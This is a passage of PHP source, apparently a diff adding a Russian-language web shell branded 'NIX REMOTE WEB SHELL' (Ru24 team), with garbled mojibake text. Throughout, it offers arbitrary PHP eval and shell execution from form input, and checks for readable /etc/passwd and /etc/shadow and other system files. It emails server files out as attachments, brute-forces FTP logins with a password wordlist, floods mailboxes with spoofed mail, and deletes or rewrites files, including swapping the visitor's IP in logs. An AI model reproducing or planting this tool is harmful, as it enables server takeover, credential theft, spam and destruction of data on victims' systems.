color=gray></font>&nbsp;&nbsp;&nbsp;&nbsp;</b>"; +echo "<select name=alias>"; +foreach ($aliases as $alias_name=>$alias_cmd) + { + echo "<option>$alias_name</option>"; + } + echo "</select>"; +if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=hidden name=dir size=85 value=".exec("pwd").">"; } +else { echo "<input type=hidden name=dir size=85 value=".$_POST['dir'].">"; } +echo "&nbsp;&nbsp;<input type=submit name=submit value=آûïîëيèٍ?"; +echo "</font>"; +echo "</form>"; + + +break; +/// خٍïًàâêà ôàéëîâ يà ىûëî +case "download_mail": +$buf = explode(".", $file); + $dir = str_replace("\\","/",$dir); + $fullpath = $dir."/".$file; + $size = tinhbyte(filesize($fullpath)); + $fp = fopen($fullpath, "rb"); + while(!feof($fp)) + + $attachment .= fread($fp, 4096); + $attachment = base64_encode($attachment); + $subject = "NIX REMOTE WEB SHELL ($file)"; + + $boundary = uniqid("NextPart_"); + $headers = "From: $demail\nContent-type: multipart/mixed; boundary=\"$boundary\""; + + $info = "---==== رîîلùهيè?îٍ ($demail)====---\n\n"; + $info .= "IP:\t$REMOTE_ADDR\n"; + $info .= "HOST:\t$HTTP_HOST\n"; + $info .= "URL:\t$HTTP_REFERER\n"; + $info .= "DOC_ROOT:\t$PATH_TRANSLATED\n"; + $info .="--$boundary\nContent-type: text/plain; charset=iso-8859-1\nContent-transfer-encoding: 8bit\n\n\n\n--$boundary\nContent-type: application/octet-stream; name=$file \nContent-disposition: inline; filename=$file \nContent-transfer-encoding: base64\n\n$attachment\n\n--$boundary--"; + + $send_to = "$demail"; + + $send = mail($send_to, $subject, $info, $headers); + + if($send == 2) + echo "<br> + <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + <tr><td align=center> + <font color='#FFFFCC' face='Tahoma' size = 2>رïàٌèل?!!شàéë <b>$file</b> îٍïًàâëه?âà?يà <u>$demail</u>.</font></center></td></tr></table><br>"; + +fclose($fp); +break; +// ٌïèٌîê ïًîِهٌîâ +case "ps": +echo "<b>دًîِهٌٌû ?ٌèٌٍهى?</b><br>"; + + echo "<br>"; + if ($pid) + { + if (!$sig) {$sig = 9;} + echo "خٍïًàâëهيè?êîىàين?".$sig." to #".$pid."... "; + $ret = posix_kill($pid,$sig); + if ($ret) {echo "آٌ? ïًîِهٌ َلèٍ, àىèي?;} + else {echo "خطبءتہ! ".htmlspecialchars($sig).", ?ïًîِهٌ?#".htmlspecialchars($pid).".";} + } + $ret = `ps -aux`; + if (!$ret) {echo "حهâîçىîويî îٍîلًàçèٍü ٌïèٌîê ïًîِهٌîâ ! آèني?çëîé àنىè?çàïًهٍèë ps ";} + else + { + $ret = htmlspecialchars($ret); + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + $stack = explode("\n",$ret); + $head = explode(" ",$stack[0]); + unset($stack[0]); + if (empty($ps_aux_sort)) {$ps_aux_sort = $sort_default;} + if (!is_numeric($ps_aux_sort[0])) {$ps_aux_sort[0] = 0;} + $k = $ps_aux_sort[0]; + if ($ps_aux_sort[1] != "a") {$y = "<a href=\"".$surl."?ac=ps&d=".urlencode($d)."&ps_aux_sort=".$k."a\"></a>";} + else {$y = "<a href=\"".$surl."?ac=ps&d=".urlencode($d)."&ps_aux_sort=".$k."d\"></a>";} + for($i=0;$i<count($head);$i++) + { + if ($i != $k) {$head[$i] = "<a href=\"".$surl."?ac=ps&d=".urlencode($d)."&ps_aux_sort=".$i.$ps_aux_sort[1]."\"><b>".$head[$i]."</b></a>";} + } + $prcs = array(); + foreach ($stack as $line) + { + if (!empty($line)) + { + echo "<tr>"; + $line = explode(" ",$line); + $line[10] = join(" ",array_slice($line,10,count($line))); + $line = array_slice($line,0,11); + $line[] = "<a href=\"".$surl."?ac=ps&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>"; + $prcs[] = $line; + echo "</tr>"; + } + } + $head[$k] = "<b>".$head[$k]."</b>".$y; + $head[] = "<b>ACTION</b>"; + $v = $ps_aux_sort[0]; + usort($prcs,"tabsort"); + if ($ps_aux_sort[1] == "d") {$prcs = array_reverse($prcs);} + $tab = array(); + $tab[] = $head; + $tab = array_merge($tab,$prcs); + echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=white borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">"; + foreach($tab as $k) + { + echo "<tr>"; + foreach($k as $v) {echo "<td>".$v."</td>";} + echo "</tr>"; + } + echo "</table>"; + } +break; + +//PHP Eval Code execution +case "eval": + +echo <<<HTML +<b>بٌïîëيهيèه ïُ?êîنà (له?"< ? ? >")</b> +<table> +<form method="POST" action="$self"> +<input type="hidden" name="ac" value="eval"> +<tr> +<td><textarea name="ephp" rows="10" cols="60"></textarea></td> +</tr> +<tr> +<td><input type="submit" value="Enter"></td> +$tend +HTML; + +if (isset($_POST['ephp'])){ +eval($_POST['ephp']); +} +break; + +// SEND MAIL +case "sendmail": +echo <<<HTML +<table> +<form method="POST" action="$self"> +<input type="hidden" name="ac" value="sendmail"> +<tr>خٍ êîمî: <br> +<input type="TEXT" name="frommail"> +<br>تîىَ:<br> <input type="TEXT" name="tomailz"> +<br>زهىà: <br><input type="TEXT" name="mailtema"> +<br>زهêٌ? <br> +<td><textarea name="mailtext" rows="10" cols="60"></textarea></td> +</tr> +<tr> +<td><input type="submit" value="خٍïًàâèٍ? name="submit"></td><form> +$tend +HTML; +// يèêàêàے ïًîâهًêà يه نهëàهٍ?, ?çà÷ه?? =) +if (isset($submit)) +{ + +mail($tomailz,$mailtema,$mailtext,"From: $frommail"); +echo "<h2>رîîلùهيè?îٍïًàâëهيî !</h2>"; +} +break; + + +// بيôîًىàِ? ?ٌèٌٍهى?case "info": +if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") +{ + $safemode = true; + $hsafemode = "<font color=\"red\">آêë‏÷هيî</font>"; +} +else {$safemode = false; $hsafemode = "خٍêë‏÷هي?/font>";} +/* display information */ +echo "<b>[ بيôîًىàِ? ?ٌèٌٍهى?]</b><br>"; +echo "<b>صîٌٍ:</b> ".$_SERVER["HTTP_HOST"]."<br>" ; +echo "<b>IP ٌهًâهً?</b> ".gethostbyname($_SERVER["HTTP_HOST"])."<br>"; +echo " <b>رهًâهً: </b>".$_SERVER['SERVER_SIGNATURE']." "; +echo "<b>OC:</b> ".exec("uname -a")."("; +print "".php_uname()." )<br>\n"; +echo "<b>Safe-Mode: ".$hsafemode."</b><br>"; +echo "<b>دًèâèëهمèè: </b>".exec("id")."<br>"; +echo "<b>آٌهم?ىهٌٍ? </b>" . (int)(disk_total_space(getcwd())/(1024*1024)) . "Mb. " . "<b>رâîلîنيî: </b>: " . (int)(disk_free_space(getcwd())/(1024*1024)) . "Mb. <br>"; +echo "<b>زهêَùè?êàٍàëî?</b>".exec("pwd").""; +echo " <br><b>زهêَّè?web ïٍَü: </b>".@$_SERVER['PHP_SELF']." "; +echo "<br><b>زâîé IP:</b> ".$_SERVER['REMOTE_HOST']." (".$_SERVER['REMOTE_ADDR'].")<br>"; +echo "<b>PHP version : </b>".phpversion()."<BR>"; +echo "<b> ID âëàنهëüِ?ïًîِهٌ?: </b>".get_current_user()."<BR>"; +echo "<b>MySQL</b> : ".mysql_get_server_info()."<BR>"; +if(file_exists('/etc/passwd') && is_readable('/etc/passwd')){ +print '<b>إٌٍü نîٌٍَï ?/etc/passwd ! </b><br>'; +} +if(file_exists('/etc/shadow') && is_readable('/etc/shadow')){ +print '<b>إٌٍü نîٌٍَï ?/etc/shadow !</b> <br>'; +} +if(file_exists('/etc/shadow-') && is_readable('/etc/shadow-')){ +print '<b>إٌٍü نîٌٍَï ?/etc/shadow- !</b> '; +} +if(file_exists('/etc/master.passwd') && is_readable('/etc/master.passwd')){ +print '<b>إٌٍü نîٌٍَï ?/etc/master.passwd ! </b><br>'; +} +if(isset($_POST['th']) && $_POST['th']!=''){ +chdir($_POST['th']); +}; +if(is_writable('/tmp/')){ +$fp=fopen('/tmp/qq8',"w+"); +fclose($fp); +print "/tmp - îٍêًûٍ?nbsp;<br>\n"; +unlink('/tmp/qq8'); +} +else{ +print "<font color=red>/tmp - يه îٍêًûٍ?/font><br>"; +} +echo "<b>ءهçîïàٌيûé ًهوè? ".$hsafemode."</b><br>"; +if ($nixpasswd) + { + if ($nixpasswd == 1) {$nixpasswd = 0;} + $num = $nixpasswd + $nixpwdperpage; + echo "<b>*nix /etc/passwd:</b><br>"; + $i = $nixpasswd; + while ($i < $num) + { + $uid = posix_getpwuid($i); + if ($uid) {echo join(":",$uid)."<br>";} + $i++; + } + } + else {echo "<br><a href=?ac=navigation&d=/etc/&e=passwd><b><u>Get /etc/passwd</u></b></a><br>";} + if (file_get_contents("/etc/userdomains")) {echo "<b><a href=\"".$surl."act=f&f=userdomains&d=/etc/&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></b><br>";} + if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><a href=\"".$surl."act=f&f=accounting.log&d=/var/cpanel/&ft=txt\"><u><b>View cpanel logs</b></u></a></b><br>";} + if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><a href=?ac=navigation&d=/usr/local/apache/conf&e=httpd.conf><u><b>تîيôèمَيàِ? Apache (httpd.conf)</b></u></a></b><br>";} + { echo "<b><a href=?ac=navigation&d=/etc/httpd/conf&e=httpd.conf><u><b>تîيôèمَيàِ? Apache (httpd.conf)</b></u></a></b><br>";} + if (file_get_contents("/etc/httpd.conf")) {echo "<b><a href=?ac=navigation&d=/etc/&e=httpd.conf><u><b>تîيôèمَيàِ? Apache (httpd.conf)</b></u></a></b><br>";} + if (file_get_contents("/etc/httpd.conf")) {echo "<b><a href=?ac=navigation&d=/var/cpanel&e=accounting.log><u><b>cpanel log </b></u></a></b><br>";} + break; + +// ?ٌêًèïٍ?case "about": + +echo "<center><b>دًèâهٍ âٌهى</b></center>دهًه?âàىè ïهًâ? âهًٌ? ىîهم?ٌêًèïٍ?َنàëهييîمî àنىèيèًٌٍèًîâàيèے.<b>(0.5a)</b> <br>رêًèïٍ يàُîنèٌٍے ?ٌٍàنèè ٍهٌٍèًîâàي?, ٍà? ÷ٍ?هٌëè يàéنهٍ?êàêè?ٍî لàمè, îلًàùàéٍهٌ?ٌ‏نà:<br><a href='http://ru24-team.net/forum/'>http://ru24-team.net/forum/</a> èë?<a href=mailto:dreamerz@mail.ru>يà ىûëî dreamerz@mail.ru</a>, èë?يà <a href=http://dreamerz.cc>dreamerz.cc</a>, èë?يà ICQ: <b>817312</b><br>تٍ?ُî÷ه?ïîَ÷àٌٍâîâàٍ??ًàçًàلîٍêه ٌêًèïٍ?- ïèّèٍه, ïîêàçَéٍ?÷ٍ?âû ىîوهٍه نîلàâèٍü ?èٌïًàâèٍ?..<br>حَ, ?ٌïàٌèل?‎ٍèى ë‏?? Terabyte, 1dt_wolf, xoce, FUF, dodbob, Nitrex ... ?ىيîمèى نًَمèى ..."; +echo "<br> ?èٌïîëüçَے ‎ٍîٍ ٌêًèïٍ يà ÷َوè?ٌهًâهًàُ âû يàًَّàهٍ?çàêî?:) زà?÷ٍ?îٌٍîًîويهه. "; + +echo "<br><br><br>حîâàے âهًٌ? ëهوè?çنهٌ? <a href=http://ru24-team.net/releases/nr.rar>http://ru24-team.net/releases/nr.rar</a> +<br><br><center><b>------------------------------->>> Ru24 - TEAM NRWS RELEASE 0.5.a [DreAmeRz] <<<-----------------------------------</b></center>"; +break; +// شز?ïîنلîً ïàًîëه?case "ftppass": + +$filename="/etc/passwd"; // passwd file +$ftp_server="localhost"; // FTP-server + +echo "FTP-server: <b>$ftp_server</b> <br><br>"; + +$fp = fopen ($filename, "r"); +if ($fp) +{ +while (!feof ($fp)) { +$buf = fgets($fp, 100); +ereg("^([0-9a-zA-Z]{1,})\:",$buf,$g); +$ftp_user_name=$g[1]; +$ftp_user_pass=$g[1]; +$conn_id=ftp_connect($ftp_server); +$login_result=@ftp_login($conn_id, $ftp_user_name, $ftp_user_pass); + +if (($conn_id) && ($login_result)) { +echo "<b>دîنêë‏÷هيè? login:password - ".$ftp_user_name.":".$ftp_user_name."</b><br>"; +ftp_close($conn_id);} +else { +echo $ftp_user_name." - error<br>"; +} +}} +break; + +case "ftp": + +echo " + <TABLE CELLPADDING=0 CELLSPACING=0 width=500 align=center> + <form action='$PHP_SELF?ac=ftp' method=post><tr><td align=left valign=top colspan=3 class=pagetitle> + <b><a href=?ac=ftppass>دًîâهًèٍ?يà ٌâےçê?login\password</a></b> +</td></tr> + +<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;FTPHost:</td> +<td align=left width=350>&nbsp;&nbsp;&nbsp; +<input class='inputbox' type='text' name='host' size=50></td></tr> +<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Login:</td> +<td align=left width=350>&nbsp;&nbsp;&nbsp; +<input class='inputbox' type='text' name='login' size=50></td></tr> +<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;تîëëè÷هٌٍâ?ïàًîëه?</td> +<td align=left width=350>&nbsp;&nbsp;&nbsp; +<input class='inputbox' type='text' name='chislo' size=10> <1000 pass </td></tr> +<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;دàًîëü نëے ïًîâهًêè:</td> +<td align=left width=350>&nbsp;&nbsp;&nbsp; +<input class='inputbox' type='text' name='proverka' size=50> +<input type='submit' value='Brut FTP' class=button1 $style_button><br><b>ثî?ٌîًُàيےهٍ? ?pass.txt</b></td></tr> + + + + </form></table>"; + + +function s() { + $word="qwrtypsdfghjklzxcvbnm"; + return $word[mt_rand(0,strlen($word)-1)]; +} + +function g() { + $word="euioam"; + return $word[mt_rand(0,strlen($word)-2)]; +} + +function name0() { return s().g().s(); } +function name1() { return s().g().s().g(); } +function name2() { return s().g().g().s(); } +function name3() { return s().s().g().s().g(); } +function name4() { return g().s().g().s().g(); } +function name5() { return g().g().s().g().s(); } +function name6() { return g().s().s().g().s(); } +function name7() { return s().g().g().s().g(); } +function name8() { return s().g().s().g().g(); } +function name9() { return s().g().s().g().s().g(); } +function name10() { return s().g().s().s().g().s().s(); } +function name11() { return s().g().s().s().g().s().s().g(); } + +$cool=array(1,2,3,4,5,6,7,8,9,10,99,100,111,111111,666,1978,1979,1980,1981,1982,1983,1984,1985,1986,1987,1988,1989,1990,1991,1992,1993,1994,1995,1996,1997,1998,1999,2000,2001,2002,2003,2004,2005); +$cool2=array('q1w2e3','qwerty','qwerty111111','123456','1234567890','0987654321','asdfg','zxcvbnm','qazwsx','q1e3r4w2','q1r4e3w2','1q2w3e','1q3e2w','poiuytrewq','lkjhgfdsa','mnbvcxz','asdf','root','admin','admin123','lamer123','admin123456','administrator','administrator123','q1w2e3r4t5','root123','microsoft','muther','hacker','hackers','cracker'); + +function randword() { + global $cool; + $func="name".mt_rand(0,11); + $func2="name".mt_rand(0,11); + switch (mt_rand(0,11)) { + case 0: return $func().mt_rand(5,99); + case 1: return $func()."-".$func2(); + case 2: return $func().$cool[mt_rand(0,count($cool)-1)]; + case 3: return $func()."!".$func(); + case 4: return randpass(mt_rand(5,12)); + default: return $func(); + } + + +} + +function randpass($len) { + $word="qwertyuiopasdfghjklzxcvbnm1234567890"; + $s=""; + for ($i=0; $i<$len; $i++) { + $s.=$word[mt_rand(0,strlen($word)-1)]; + } + return $s; +} +if (@unlink("pass.txt") < 0){ +echo "يهٍَ يè÷همî"; +exit; +} +$file="pass.txt"; +if($file && $host && $login){ + $cn=mt_rand(30,30); +for ($i=0; $i<$cn; $i++) { + $s=$cool2[$i]; + $f=@fopen(pass.".txt","a+"); + fputs($f,"$s\n"); + } + + $cnt2=mt_rand(43,43); +for ($i=0; $i<$cnt2; $i++) { + $r=$cool[$i]; + $f=@fopen(pass.".txt","a+"); + fputs($f,"$login$r\n"); +} +$p="$proverka"; + $f=@fopen(pass.".txt","a+"); + fputs($f,"$p\n"); + + $cnt3=mt_rand($chislo,$chislo); + for ($i=0; $i<$cnt3; $i++) { + $u=randword(); + $f=@fopen(pass.".txt","a+"); + fputs($f,"$u\n"); + } + + if(is_file($file)){ + $passwd=file($file,1000); + for($i=0; $i<count($passwd); $i++){ + $stop=false; + $password=trim($passwd[$i]); + $open_ftp=@fsockopen($host,21); + if($open_ftp!=false){ + fputs($open_ftp,"user $login\n"); + fputs($open_ftp,"pass $password\n"); + while(!feof($open_ftp) && $stop!=true){ + $text=fgets($open_ftp,4096); + if(preg_match("/230/",$text)){ + $stop=true; + $f=@fopen($host._ftp,"a+"); + fputs($f,"Enter on ftp:\nFTPhosting:\t$host\nLogin:\t$login\nPassword:\t$password\n "); + + echo " + <TABLE CELLPADDING=0 CELLSPACING=0 width=500 align=center> +<tr><td align=center class=pagetitle><b><font color=\"blue\">دîçنًàâëے?!! دàًîëü ïîنîلًàي.</font></b><br> +&nbsp;&nbsp;تîيهêٍ: <b>$host</b><br>&nbsp;&nbsp;ثîمè? <b>$login</b><br>&nbsp;&nbsp;دàًîëü: <b>$password</b></td></tr></table> +";exit; + } + elseif(preg_match("/530/",$text)){ + $stop=true; + + } + } + fclose($open_ftp); + }else{ + echo " + <TABLE CELLPADDING=0 CELLSPACING=0 width=500 align=center> +<tr><td align=center class=pagetitle bgcolor=#FF0000><b>حه âهًي?َêàçàي?ôٍ?ُîٌٍèيمà!!! حà <b><u>$host</u></b> çàêًûٍ 21 ïîًٍ</b></b></td></tr> +</table> +";exit; + } + } + } +} + + +break; +// SQL Attack +case "sql": + +break; + + + + + + +// MailFlud +case "mailfluder": + +$email=$_POST['email']; // جûëî وهًٍâû +$from=$_POST['from']; // جûëî وهًٍâû +$num=$_POST['num']; // ×èٌë?ïèٌه?$text=$_POST['text']; // زهêٌ?ôëَن?$kb=$_POST['kb']; // آه?ïèٌüىà (kb) +?> +<script language="JavaScript"><!-- +function reset_form() { +document.forms[0].elements[0].value=""; +document.forms[0].elements[1].value=""; +document.forms[0].elements[2].value=""; +document.forms[0].elements[3].value=""; +document.forms[0].elements[4].value=""; +} +//--></script> +<?php +if (($email!="" and isset($email)) and ($num!="" and isset($num)) and ($text!="" and isset($text)) and ($kb!="" and isset($kb))) { + +$num_text=strlen($text)+1; // خïًهنه?هٍ نëèييَ ٍهêٌٍà + 1 (ïًîلهë ?êîيِ? +$num_kb=(1024/$num_text)*$kb; +$num_kb=ceil($num_kb); + +for ($i=1; $i<=$num_kb; $i++) { +$msg=$msg.$text." "; +} + +for ($i=1; $i<=$num; $i++) { +mail($email, $text, $msg, "From: $from"); +} + +$all_kb=$num*$kb; + +echo <<<EOF +<p align="center">ئهًٍâà: <b>$email</b><br> +تî?âî ïèٌه? <b>$num</b><br> +خلùè?ïîٌëàييû?îلْه? <b>$all_kb kb</b><br></p> +EOF; + +} + +else { + +echo <<<EOF +<form action="?ac=mailfluder" method="post"> +<table align="center" border="0" bordercolor="#000000"> +<tr><td>جûëî وهًٍâû</td><td><input type="text" name="email" value="to@mail.com" size="25"></td></tr> +<tr><td>خٍ ىûëà</td><td><input type="text" name="from" value="sypport@mail.com" size="25"></td></tr> +<tr><td>×èٌë?ïèٌه?/td><td><input type="text" name="num" value="5" size="25"></td></tr> +<tr><td>زهêٌ?ôëَن?/td><td><input type="text" name="text" value="fack fack fack" size="25"></td></tr> +<tr><td>آه?ïèٌüىà (kb)</td><td><input type="text" name="kb" value="10" size="25"></td></tr> +<tr><td colspan="2" align="center"><input type="submit">&nbsp;&nbsp;<input type="button" onclick="reset_form()" value="Reset"></td></tr> +</table> +</form> +EOF; + +} +break; + +case "tar": +# àًُèâàِèے نèًهêٍîًèè +$fullpath = $d."/".$tar; +/* çàنàهى ًàينîىيû?يàçâàي? ôàéëîâ àًُèâàِè?/ +$CHARS = "abcdefghijklmnopqrstuvwxyz"; +for ($i=0; $i<6; $i++) $charsname .= $CHARS[rand(0,strlen($CHARS)-1)]; + echo "<br> +تàٍàëî?<u><b>$fullpath</b></u> ".exec("tar -zc $fullpath -f $charsname.tar.gz")."َïàêîâàي ?ôàéë <u>$charsname.tar.gz</u>"; + + + +echo " + +<form action='?ac=tar' method='post'> +<tr><td align=center colspan=2 class=pagetitle><b>ہًُèâàِèے <u>$name.tar.gz</u>:</b></td></tr> +<tr> +<td valign=top><input type=text name=archive size=90 class='inputbox'value='tar -zc /home/$name$http_public -f $name.tar.gz' ></td> +<td valign=top><input type=submit value='ؤàâè'></td> +</tr></form>"; + +exec($archive); + +break; + + +// حàâèمàِèے +case "navigation": + // دîّë?يàâèمàِèے +$mymenu = " [<a href='$php_self?ac=navigation&d=$d&e=$e&delete=1'>سنàëèٍ?/a>] [<a href='$php_self?ac=navigation&d=$d&ef=$e&edit=1'>ذهنàêٍèًîâàٍ?/a>] [<a href='$php_self?ac=navigation&d=$d&e=$e&clean=1'>خ÷èٌٍèٍü</a>] [<a href='$php_self?ac=navigation&d=$d&e=$e&replace=1'>اàىهيèٍü ٍهêٌ?/a>] [<a href='$php_self?ac=navigation&d=$d&download=$e'>اàمًَçèٍ?/a>] [<a href='$php_self?ac=navigation&d=$d&infofile=$e'>بيôîًىàِ?</a>]<br>"; + +$images=array(".gif",".jpg",".png",".bmp",".jpeg"); +$whereme=getcwd(); +@$d=@$_GET['d']; +$copyr = "<center>"; +$php_self=@$_SERVER['PHP_SELF']; +if(@eregi("/",$whereme)){$os="unix";} +if(!isset($d)){$d=$whereme;} +$d=str_replace("\\","/",$d); + + + +$expl=explode("/",$d); +$coun=count($expl); +if($os=="unix"){echo "<a href='$php_self?ac=navigation&d=/'>/</a>";} +else{ + echo "<a href='$php_self?ac=navigation&d=$expl[0]'>$expl[0]/</a>";} +for($i=1; $i<$coun; $i++){ + @$xx.=$expl[$i]."/"; +$sls="<a href='$php_self?ac=navigation&d=$expl[0]/$xx'>$expl[$i]</a>/"; +$sls=str_replace("//","/",$sls); +$sls=str_replace("/'></a>/","/'></a>",$sls); +print $sls; +} +echo "</td></tr>"; +echo "<br><td><b>id:</b> ".@exec('id')."</td></tr"; + + +if(@$_GET['deldir']=="1"){ + +@$dir=$_GET['d']; +function deldir($d) +{ +$handle = @opendir($d); +while (false!==($ff = @readdir($handle))){ +if($ff != "." && $ff != ".."){ +if(@is_dir("$d/$ff")){ +deldir("$d/$ff"); +}else{ +@unlink("$d/$ff"); +}}} +@closedir($handle); +if(@rmdir($d)){ +@$success = true;} +return @$success; +} +$dir=@$d; +deldir($d); + +$rback=$_GET['rback']; +@$rback=explode("/",$rback); +$crb=count($rback); +for($i=0; $i<$crb-1; $i++){ + @$x.=$rback[$i]."/"; +} +echo "<br><b>تàٍàëî?َنàëهي !</b>"; +echo $copyr; +exit;} +if(@$_GET['replace']=="1"){ +$ip=@$_SERVER['REMOTE_ADDR']; +$d=$_GET['d']; +$e=$_GET['e']; +@$de=$d."/".$e; +$de=str_replace("//","/",$de); +$e=@$e; +echo $mymenu ; +echo " +رًهنٌٍâî çàىهيû:<br> +(زû ىîوه?çàىه?ٍü ë‏لî?ٍهêٌ?<br> +شàéë: $de<br> +<form method=post> +1. زâîé IP.<br> +2. microsoft.com IP :)<br> +اàىه?ٍü ‎ٍ?<input name=this size=30 value=$ip> ‎ٍèى <input name=bythis size=30 value=207.46.245.156> +<input type=submit name=doit value=اàىهيèٍü> +</form> +"; + +if(@$_POST['doit']){ + +$filename="$d/$e"; +$fd = @fopen ($filename, "r"); +$rpl = @fread ($fd, @filesize ($filename)); +$re=str_replace("$this","$bythis",$rpl); +$x=@fopen("$d/$e","w"); +@fwrite($x,"$re"); +echo "<br><center>$this اàىهيهيî يà $bythis<br> +[<a href='$php_self?ac=navigation&d=$d&e=$e'>دîٌىîًٍهٍü ôàéë</a>]<br><br><Br>"; + +} +echo $copyr; +exit;} + + + + +if(@$_GET['yes']=="yes"){ +$d=@$_GET['d']; $e=@$_GET['e']; +unlink($d."/".$e); +$delresult="سنàëèë $d/$e يه ïàًٌے ! <meta http-equiv=\"REFRESH\" content=\"2;URL=$php_self?ac=navigation&d=$d\">"; +} +if(@$_GET['clean']=="1"){ +@$e=$_GET['e']; +$x=fopen("$d/$e","w"); +fwrite($x,""); +echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?ac=navigation&d=$d&e=".@$e."\">"; +exit; +} + + +if(@$_GET['e']){ +$d=@$_GET['d']; +$e=@$_GET['e']; +$pinf=pathinfo($e); +if(in_array(".".@$pinf['extension'],$images)){ +echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?ac=navigation&d=$d&e=$e&img=1\">"; +exit;} +$filename="$d/$e"; +$fd = @fopen ($filename, "r"); +$c = @fread ($fd, @filesize ($filename)); +$c=htmlspecialchars($c); +$de=$d."/".$e; +$de=str_replace("//","/",$de); +if(is_file($de)){ +if(!is_writable($de)){echo "<font color=red><br><b>زخثـتخ ×زإحبإ</b></font><br>";}} +echo $mymenu ; +echo " +رîنهًوèىîه ôàéë?<br> +$de +<br> +<table width=100% border=1 cellpadding=0 cellspacing=0> +<tr><td><pre> +$c + +</pre></td></tr> +</table>"; +if(@$_GET['delete']=="1"){ +$delete=$_GET['delete']; +echo " +سنàëهيèه: زû َâهًهي ?<br> +<a href=\"$php_self?ac=navigation&d=$d&e=$e&delete=".@$delete."&yes=yes\">ؤà</a> || <a href='$php_self?no=1'>حه?/a> +<br> +"; +if(@$_GET['yes']=="yes"){ +@$d=$_GET['d']; @$e=$_GET['e']; +echo $delresult; +} +if(@$_GET['no']){ +echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?ac=navigation&d=$d&e=$e\"> +"; +} + + +} #end of delete +echo $copyr; +exit; +} #end of e + +if(@$_GET['edit']=="1"){ +@$d=$_GET['d']; +@$ef=$_GET['ef']; +if(is_file($d."/".$ef)){ +if(!is_writable($d."/".$ef)){echo "<font color=red><br><b>زخثـتخ ×زإحبإ</b></font><br>";}} +echo $mymenu ; +$filename="$d/$ef"; +$fd = @fopen ($filename, "r"); +$c = @fread ($fd, @filesize ($filename)); +$c=htmlspecialchars($c); +$de=$d."/".$ef; +$de=str_replace("//","/",$de); +echo " +ذهنàêٍèًîâàيèه:<br> +$de<br> +<form method=post> +<input type=HIDDEN name=filename value='$d/$ef'> +<textarea cols=143 rows=30 name=editf>$c</textarea> +<br> +<input type=submit name=save value='رîًُàيèٍ?èçىهيèے'></form><br> + +"; +if(@$_POST['save']){ +$editf=@$_POST['editf']; +$editf=stripslashes($editf); +$f=fopen($filename,"w+"); +fwrite($f,"$editf"); +echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?ac=navigation&d=$d&e=$ef\">"; +exit; +} + +exit; +} + + + +echo" +<table width=100% cellpadding=1 cellspacing=0 class=hack> +<a href='?ac=tar&d=$d' title='ہًُèâàِèے ïًîèçîéنهٍ ٍîëüêî ïً?يàëè÷è?ïًàâ çàïèٌè ?êàٍàëî?!'><b>[ہًُèâàِèے êàٍàëîمà] </b></a> +<a href='?ac=tar&as=mail&d=$d' title='دًîèٌُîنèٍ àًُèâàِèے êàٍàëîمà + îٍïًàâêà àًُèâà يà âà?e-mail ! ?ِèے يه نîٌٍَïيà ?0.5?âهًٌèè!'><b>[ہًُèâàِèے êàٍàëîمà + خٍïًàâêà يà ?mail] </b></a> +<a href='?ac=navigation&d=$d&deldir=1' title='دîëيîه َنàëهيèه êàٍàëîمà !\n رïًàّèâàٍü ïîنٍâهًونهيèے ٍه? يèêٍ?يه لَنه?:)'><b>[سنàëهيèه êàٍàëîمà] </b></a> +<tr><td bgcolor=#4d9ef0><center><b>حàçâàيèه</b></td><td bgcolor=#4d9ef0><b>ذàçىهً</b></td><td bgcolor=#4d9ef0><b>ؤîٌٍَï</b></td></tr> +"; +$dirs=array(); +$files=array(); +$dh = @opendir($d) or die("<table width=100%><tr><td><center>تàٍàëî?يه ٌَùهٌٍâَهٍ èë?نîٌٍَï ?يهىَ çàïًهùهي !</center><br>$copyr</td></tr></table>"); +while (!(($file = readdir($dh)) === false)) { +if ($file=="." || $file=="..") continue; +if (@is_dir("$d/$file")) { + $dirs[]=$file; +}else{ + $files[]=$file; + } + sort($dirs); + sort($files); + +$fz=@filesize("$d/$file"); +} + +function perm($perms){ +if (($perms & 0xC000) == 0xC000) { + $info = 's'; +} elseif (($perms & 0xA000) == 0xA000) { + $info = 'l'; +} elseif (($perms & 0x8000) == 0x8000) { + $info = '-'; +} elseif (($perms & 0x6000) == 0x6000) { + $info = 'b'; +} elseif (($perms & 0x4000) == 0x4000) { + $info = 'd'; +} elseif (($perms & 0x2000) == 0x2000) { + $info = 'c'; +} elseif (($perms & 0x1000) == 0x1000) { + $info = 'p'; +} else { + $info = 'u'; +} +$info .= (($perms & 0x0100) ? 'r' : '-'); +$info .= (($perms & 0x0080) ? 'w' : '-'); +$info .= (($perms & 0x0040) ? + (($perms & 0x0800) ? 's' : 'x' ) : + (($perms & 0x0800) ? 'S' : '-')); +$info .= (($perms & 0x0020) ? 'r' : '-'); +$info .= (($perms & 0x0010) ? 'w' : '-'); +$info .= (($perms & 0x0008) ? + (($perms & 0x0400) ? 's' : 'x' ) : + (($perms & 0x0400) ? 'S' : '-')); +$info .= (($perms & 0x0004) ? 'r' : '-'); +$info .= (($perms & 0x0002) ? 'w' : '-'); +$info .= (($perms & 0x0001) ? + (($perms & 0x0200) ? 't' : 'x' ) : + (($perms & 0x0200) ? 'T' : '-')); +return $info; +} +for ($i=0;$i<sizeof($dirs);$i++) { + if ($dirs[$i] != "..") { + + +if(is_writable($dirs[$i])){$info="<font color=green><li>&nbsp;W</font>";} +else{$info="<font color=red><li>&nbsp;R</font>";} 